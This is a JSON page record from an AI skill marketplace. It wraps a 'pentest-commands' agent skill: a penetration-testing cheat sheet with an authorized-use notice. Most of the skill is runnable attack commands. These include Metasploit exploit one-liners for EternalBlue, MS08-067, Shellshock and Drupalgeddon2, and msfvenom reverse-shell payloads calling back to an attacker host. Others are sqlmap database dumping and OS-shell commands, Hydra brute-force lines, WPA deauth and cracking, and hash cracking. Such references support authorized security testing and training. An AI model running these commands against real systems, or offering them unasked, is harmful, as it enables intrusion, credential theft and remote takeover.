[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4":3,"$fa-YCsaND6dsZ_l8hSNZUNIfbeUTrUbTK7QCzrwPxv9Q":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4","pentest-commands","提供包括网络扫描、利用、密码破解和Web应用测试在内的渗透测试工具的全面命令参考。在安全评估期间实现快速命令查找。","cat_coding_review","mod_coding","sickn33,coding","---\nname: pentest-commands\ndescription: \"Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Pentest Commands\n\n## Purpose\n\nProvide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.\n\n## Inputs\u002FPrerequisites\n\n- Kali Linux or penetration testing distribution\n- Target IP addresses with authorization\n- Wordlists for brute forcing\n- Network access to target systems\n- Basic understanding of tool syntax\n\n## Outputs\u002FDeliverables\n\n- Network enumeration results\n- Identified vulnerabilities\n- Exploitation payloads\n- Cracked credentials\n- Web vulnerability findings\n\n## Core Workflow\n\n### 1. Nmap Commands\n\n**Host Discovery:**\n\n```bash\n# Ping sweep\nnmap -sP 192.168.1.0\u002F24\n\n# List IPs without scanning\nnmap -sL 192.168.1.0\u002F24\n\n# Ping scan (host discovery)\nnmap -sn 192.168.1.0\u002F24\n```\n\n**Port Scanning:**\n\n```bash\n# TCP SYN scan (stealth)\nnmap -sS 192.168.1.1\n\n# Full TCP connect scan\nnmap -sT 192.168.1.1\n\n# UDP scan\nnmap -sU 192.168.1.1\n\n# All ports (1-65535)\nnmap -p- 192.168.1.1\n\n# Specific ports\nnmap -p 22,80,443 192.168.1.1\n```\n\n**Service Detection:**\n\n```bash\n# Service versions\nnmap -sV 192.168.1.1\n\n# OS detection\nnmap -O 192.168.1.1\n\n# Comprehensive scan\nnmap -A 192.168.1.1\n\n# Skip host discovery\nnmap -Pn 192.168.1.1\n```\n\n**NSE Scripts:**\n\n```bash\n# Vulnerability scan\nnmap --script vuln 192.168.1.1\n\n# SMB enumeration\nnmap --script smb-enum-shares -p 445 192.168.1.1\n\n# HTTP enumeration\nnmap --script http-enum -p 80 192.168.1.1\n\n# Check EternalBlue\nnmap --script smb-vuln-ms17-010 192.168.1.1\n\n# Check MS08-067\nnmap --script smb-vuln-ms08-067 192.168.1.1\n\n# SSH brute force\nnmap --script ssh-brute -p 22 192.168.1.1\n\n# FTP anonymous\nnmap --script ftp-anon 192.168.1.1\n\n# DNS brute force\nnmap --script dns-brute 192.168.1.1\n\n# HTTP methods\nnmap -p80 --script http-methods 192.168.1.1\n\n# HTTP headers\nnmap -p80 --script http-headers 192.168.1.1\n\n# SQL injection check\nnmap --script http-sql-injection -p 80 192.168.1.1\n```\n\n**Advanced Scans:**\n\n```bash\n# Xmas scan\nnmap -sX 192.168.1.1\n\n# ACK scan (firewall detection)\nnmap -sA 192.168.1.1\n\n# Window scan\nnmap -sW 192.168.1.1\n\n# Traceroute\nnmap --traceroute 192.168.1.1\n```\n\n### 2. Metasploit Commands\n\n**Basic Usage:**\n\n```bash\n# Launch Metasploit\nmsfconsole\n\n# Search for exploits\nsearch type:exploit name:smb\n\n# Use exploit\nuse exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# Show options\nshow options\n\n# Set target\nset RHOST 192.168.1.1\n\n# Set payload\nset PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp\n\n# Run exploit\nexploit\n```\n\n**Common Exploits:**\n\n```bash\n# EternalBlue\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue; set RHOST 192.168.1.1; exploit\"\n\n# MS08-067 (Conficker)\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fms08_067_netapi; set RHOST 192.168.1.1; exploit\"\n\n# vsftpd backdoor\nmsfconsole -x \"use exploit\u002Funix\u002Fftp\u002Fvsftpd_234_backdoor; set RHOST 192.168.1.1; exploit\"\n\n# Shellshock\nmsfconsole -x \"use exploit\u002Flinux\u002Fhttp\u002Fapache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit\"\n\n# Drupalgeddon2\nmsfconsole -x \"use exploit\u002Funix\u002Fwebapp\u002Fdrupal_drupalgeddon2; set RHOST 192.168.1.1; exploit\"\n\n# PSExec\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fpsexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit\"\n```\n\n**Scanners:**\n\n```bash\n# TCP port scan\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fportscan\u002Ftcp; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SMB version scan\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SMB share enumeration\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_enumshares; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SSH brute force\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fssh\u002Fssh_login; set RHOSTS 192.168.1.0\u002F24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run\"\n\n# FTP brute force\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fftp\u002Fftp_login; set RHOSTS 192.168.1.0\u002F24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run\"\n\n# RDP scanning\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Frdp\u002Frdp_scanner; set RHOSTS 192.168.1.0\u002F24; run\"\n```\n\n**Handler Setup:**\n\n```bash\n# Multi-handler for reverse shells\nmsfconsole -x \"use exploit\u002Fmulti\u002Fhandler; set PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit\"\n```\n\n**Payload Generation (msfvenom):**\n\n```bash\n# Windows reverse shell\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux\u002Fx64\u002Fshell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf\n\n# PHP reverse shell\nmsfvenom -p php\u002Freverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php\n\n# ASP reverse shell\nmsfvenom -p windows\u002Fshell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp\n\n# WAR file\nmsfvenom -p java\u002Fjsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war\n\n# Python payload\nmsfvenom -p cmd\u002Funix\u002Freverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py\n```\n\n### 3. Nikto Commands\n\n```bash\n# Basic scan\nnikto -h http:\u002F\u002F192.168.1.1\n\n# Comprehensive scan\nnikto -h http:\u002F\u002F192.168.1.1 -C all\n\n# Output to file\nnikto -h http:\u002F\u002F192.168.1.1 -output report.html\n\n# Plugin-based scans\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins robots\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins shellshock\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins heartbleed\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins ssl\n\n# Export to Metasploit\nnikto -h http:\u002F\u002F192.168.1.1 -Format msf+\n\n# Specific tuning\nnikto -h http:\u002F\u002F192.168.1.1 -Tuning 1  # Interesting files only\n```\n\n### 4. SQLMap Commands\n\n```bash\n# Basic injection test\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\"\n\n# Enumerate databases\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --dbs\n\n# Enumerate tables\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" -D database --tables\n\n# Dump table\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" -D database -T users --dump\n\n# OS shell\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --os-shell\n\n# POST request\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Flogin\" --data=\"user=admin&pass=test\"\n\n# Cookie injection\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage\" --cookie=\"id=1*\"\n\n# Bypass WAF\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --tamper=space2comment\n\n# Risk and level\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --risk=3 --level=5\n```\n\n### 5. Hydra Commands\n\n```bash\n# SSH brute force\nhydra -l admin -P \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt ssh:\u002F\u002F192.168.1.1\n\n# FTP brute force\nhydra -l admin -P \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt ftp:\u002F\u002F192.168.1.1\n\n# HTTP POST form\nhydra -l admin -P passwords.txt 192.168.1.1 http-post-form \"\u002Flogin:user=^USER^&pass=^PASS^:Invalid\"\n\n# HTTP Basic Auth\nhydra -l admin -P passwords.txt 192.168.1.1 http-get \u002Fadmin\u002F\n\n# SMB brute force\nhydra -l admin -P passwords.txt smb:\u002F\u002F192.168.1.1\n\n# RDP brute force\nhydra -l admin -P passwords.txt rdp:\u002F\u002F192.168.1.1\n\n# MySQL brute force\nhydra -l root -P passwords.txt mysql:\u002F\u002F192.168.1.1\n\n# Username list\nhydra -L users.txt -P passwords.txt ssh:\u002F\u002F192.168.1.1\n```\n\n### 6. John the Ripper Commands\n\n```bash\n# Crack password file\njohn hash.txt\n\n# Specify wordlist\njohn hash.txt --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\n\n# Show cracked passwords\njohn hash.txt --show\n\n# Specify format\njohn hash.txt --format=raw-md5\njohn hash.txt --format=nt\njohn hash.txt --format=sha512crypt\n\n# SSH key passphrase\nssh2john id_rsa > ssh_hash.txt\njohn ssh_hash.txt --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\n\n# ZIP password\nzip2john file.zip > zip_hash.txt\njohn zip_hash.txt\n```\n\n### 7. Aircrack-ng Commands\n\n```bash\n# Monitor mode\nairmon-ng start wlan0\n\n# Capture packets\nairodump-ng wlan0mon\n\n# Target specific network\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon\n\n# Deauth attack\naireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon\n\n# Crack WPA handshake\naircrack-ng -w \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt capture-01.cap\n```\n\n### 8. Wireshark\u002FTshark Commands\n\n```bash\n# Capture traffic\ntshark -i eth0 -w capture.pcap\n\n# Read capture file\ntshark -r capture.pcap\n\n# Filter by protocol\ntshark -r capture.pcap -Y \"http\"\n\n# Filter by IP\ntshark -r capture.pcap -Y \"ip.addr == 192.168.1.1\"\n\n# Extract HTTP data\ntshark -r capture.pcap -Y \"http\" -T fields -e http.request.uri\n```\n\n## Quick Reference\n\n### Common Port Scans\n\n```bash\n# Quick scan\nnmap -F 192.168.1.1\n\n# Full comprehensive\nnmap -sV -sC -A -p- 192.168.1.1\n\n# Fast with version\nnmap -sV -T4 192.168.1.1\n```\n\n### Password Hash Types\n\n| Mode | Type |\n|------|------|\n| 0 | MD5 |\n| 100 | SHA1 |\n| 1000 | NTLM |\n| 1800 | sha512crypt |\n| 3200 | bcrypt |\n| 13100 | Kerberoast |\n\n## Constraints\n\n- Always have written authorization\n- Some scans are noisy and detectable\n- Brute forcing may lock accounts\n- Rate limiting affects tools\n\n## Examples\n\n### Example 1: Quick Vulnerability Scan\n\n```bash\nnmap -sV --script vuln 192.168.1.1\n```\n\n### Example 2: Web App Test\n\n```bash\nnikto -h http:\u002F\u002Ftarget && sqlmap -u \"http:\u002F\u002Ftarget\u002Fpage?id=1\" --dbs\n```\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Scan too slow | Increase timing (-T4, -T5) |\n| Ports filtered | Try different scan types |\n| Exploit fails | Check target version compatibility |\n| Passwords not cracking | Try larger wordlists, rules |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,141,203,"2026-05-16 13:33:38",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"编程开发","coding","mdi-code-braces","代码生成、调试、审查，提升开发效率",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"代码审查","review","mdi-magnify-scan","代码质量分析、安全审查",4,145,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"2d9a2fc5-194b-4362-b50b-bb1a3581bbb5","1.0.0","pentest-commands.zip",3260,"uploads\u002Fskills\u002F1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4\u002Fpentest-commands.zip","132f16f35a909752ce3ae3c8f06b8eaaded9d0f33134d56eb22e38a58d6b33c0","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":9639}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]